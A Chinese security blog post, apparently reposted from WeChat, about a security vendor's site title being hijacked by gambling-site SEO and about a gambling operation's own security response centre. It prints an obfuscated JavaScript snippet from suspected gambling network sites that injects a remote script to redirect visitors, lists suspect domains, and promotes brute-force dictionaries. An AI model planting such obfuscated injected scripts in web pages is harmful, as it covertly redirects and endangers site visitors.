吃瓜,某安信被XX?首家BC-SRC!
2022-8-30 00:2:0 Author: 潇湘信安(查看原文) 阅读量:125 收藏

昨天下午在朋友圈吃到这两瓜,一个是某安信官网标题被修改为某BC的了,另一个是行业内的首家BC-SRC,这两瓜之间是否还存在某些关系呢???


细思极恐,细思极恐,细思极恐!!!

吃瓜事件1:

某安信做为国内网络安全行业领军者,此次事件如果为真就打脸了,至于真相,咱也不知道,咱也不敢问,肯定不是被黑,还是等官方......吧。

图片来源:微信朋友圈

图片来源:微信友圈

简单分析:

看了下,不只是某安信有这种情况,某米及其他国内外很多站点都有,而且大都出现在搜索页,不得不说这些BC集团养的黑猫SEO团队还是挺牛逼的。

以下这些小站可能是他们养的站群,还不少,点击进去后会判断设备和来源进行跳转,这是一种很常见的黑猫SEO手段,有兴趣的师傅可以研究一下。

intitle:亚博 yabo
https://www.v2ab.nethttp://www.zxsyyg.comhttps://www.guanyutianxia.com

没有禁用JS访问就会跳转到BC推广页面。

如果已禁用JS访问直接显示的是正常页面。

疑似JS跳转代码,没有去具体分析(主要是不会)

var _0xab79=["\x64\x6F\x63\x75\x6D\x65\x6E\x74","\x77\x72\x69\x74\x65\x6C\x6E","\x3C\x73\x63\x72\x69\x70\x74\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x22\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x33\x31\x35\x32\x30\x31\x38\x2E\x63\x6F\x6D\x3A\x38\x32\x35\x39\x2F\x62\x65\x6C\x6C\x61\x2F\x73\x6A\x2E\x6A\x73\x22\x20\x63\x68\x61\x72\x73\x65\x74\x3D\x22\x75\x74\x66\x2D\x38\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E"];var _$=[_0xab79[0],_0xab79[1],_0xab79[2]];var O0=[_$[0],_$[1],_$[2]];window[O0[0x0]][O0[0x1]](O0[0x2])

但像某安信、某米这些大厂的官网就不知道他们是如何搞的了,虽然没有跳转,但是为啥谷歌会收录呢?

期待圈内大师傅们的进一步分析,可参考下遮天实验室的这篇文章奇安信“挂黑页”事件解析 

吃瓜事件2:

真是没想到,连BC都有SRC了,不管真与假?大家还是安全第一,小心被师傅们懂的!!!



关 注 有 礼

关注公众号回复“9527”可以领取一套HTB靶场文档和视频1208”个人常用高效爆破字典0221”2020年酒仙桥文章打包2191潇湘信安文章打包,“1212”杀软对比源码+数据源,0421Windows提权工具包

 还在等什么?赶紧点击下方名片关注学习吧!


推 荐 阅 读



文章来源: http://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247497938&idx=1&sn=8c473d6f4dde27ef2268b82877c7e96d&chksm=cfa55cc1f8d2d5d7d385f4f213c1c35b8eb5ec464bdf3714198765d2e31907737426cfa63976#rd
如有侵权请联系:admin#unsafe.sh